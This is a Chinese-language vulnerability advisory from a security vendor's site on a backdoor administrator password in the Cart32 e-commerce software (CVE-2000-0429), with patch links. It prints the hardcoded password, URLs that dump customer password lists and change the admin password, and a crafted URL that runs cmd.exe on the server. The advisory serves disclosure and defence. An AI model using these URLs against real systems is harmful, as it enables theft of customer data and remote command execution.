首页 -> 安全研究

安全研究

安全漏洞
McMurtrey/Whitaker & Associates Cart32存在后门管理口令漏洞

发布日期:2000-04-27
更新日期:2000-04-27

受影响系统:
McMurtrey/Whitaker & Associates Cart32 3.0
McMurtrey/Whitaker & Associates Cart32 2.6
描述:
BUGTRAQ  ID: 1153
CVE(CAN) ID: CVE-2000-0429

Cart32是一款适用于Windows操作系统上流行的电子购物系统,由McMurtrey/Whitaker及其合作者们开发。

Cart32被发现存在一个后门口令。任何知道了这个口令的攻击者都可以远程获得客户资料(包括口令,信用卡号等重要信息),并可以执行任意系统命令。

在car32.exe中存在一个后门口令:"wemilo",任何知道这个口令的攻击者都可以通过执行下列URL:

http://www.victim.com/scripts/cart32.exe/cart32clientlist

来获取客户的口令列表。尽管得到的口令是加密过的,但是通过在某些URL中使用这些口令密文,攻击者可以执行任意系统命令,例如:

http://www.victim.com/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

执行这个url会将c:的目录列表保存在file.txt中。

另外,如果攻击者知道了后门口令的话,通过提交URL:

http://charon/scripts/c32web.exe/ChangeAdminPassword

将可以修改管理口令。

<*来源:Cerberus Security Team (CST@CERBERUS-INFOSEC.CO.UK
  
  链接:http://www.cerberus-infosec.co.uk/advisories.shtml
        http://online.securityfocus.com/advisories/2183
        *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cerberus Security Team (CST@CERBERUS-INFOSEC.CO.UK)提供了如下测试方法:

http://target/scripts/cart32.exe/cart32clientlist
http://target/scripts/c32web.exe/ChangeAdminPassword

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* Lopht Research Labs/@Stake提供了非官方补丁:

L0pht/@Stake Binary:
http://www.l0pht.com/advisories/cartfix.exe
http://www.securityfocus.com/data/vulnerabilities/patches/cartfix.exe

L0pht/@Stake Source Code:
http://www.l0pht.com/advisories/cartfixsrc.zip
http://www.securityfocus.com/data/vulnerabilities/patches/cartfixsrc.zip

厂商补丁:

McMurtrey/Whitaker & Associates
-------------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

McMurtrey/Whitaker & Associates Cart32 2.6:
      McMurtrey/Whitaker & Associates Patch c32admin (2.6)
      http://www.cart32.com/download/v26latestbuilds/c32admin.exe
      Copy into the Cart32 directory. "On ISP" installations do not need
      this file.
      McMurtrey/Whitaker & Associates Patch cart
      http://www.cart32.com/download/v26latestbuilds/cart.exe
      Copy into the Cart32 directory.
      McMurtrey/Whitaker & Associates Patch cart32 (2.6)
      ftp://ftp.cart32.com/v26latestbuilds/cart32.exe
      Copy into the CGI directory.
      McMurtrey/Whitaker & Associates Patch c32web (2.6)
      ftp://ftp.cart32.com/v26latestbuilds/c32web.exe
      Copy into the CGI directory.
McMurtrey/Whitaker & Associates Cart32 3.0:
      McMurtrey/Whitaker & Associates Patch c32admin (3.0)
      ftp://ftp.cart32.com/v30latestbuilds/c32admin.exe
      Download this file only if you are running the "On your own server"
      version. Place this file in the installation directory which is c:
      \program files\mwainc\cart32 by default.
      McMurtrey/Whitaker & Associates Patch cart32 (3.0)
      http://www.cart32.com/download/v30latestbuilds/cart32.exe
      Copy into the CGI directory.
      McMurtrey/Whitaker & Associates Patch c32web (3.0)
      ftp://ftp.cart32.com/v30latestbuilds/c32web.exe
      Copy into the CGI directory.

浏览次数:6394
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客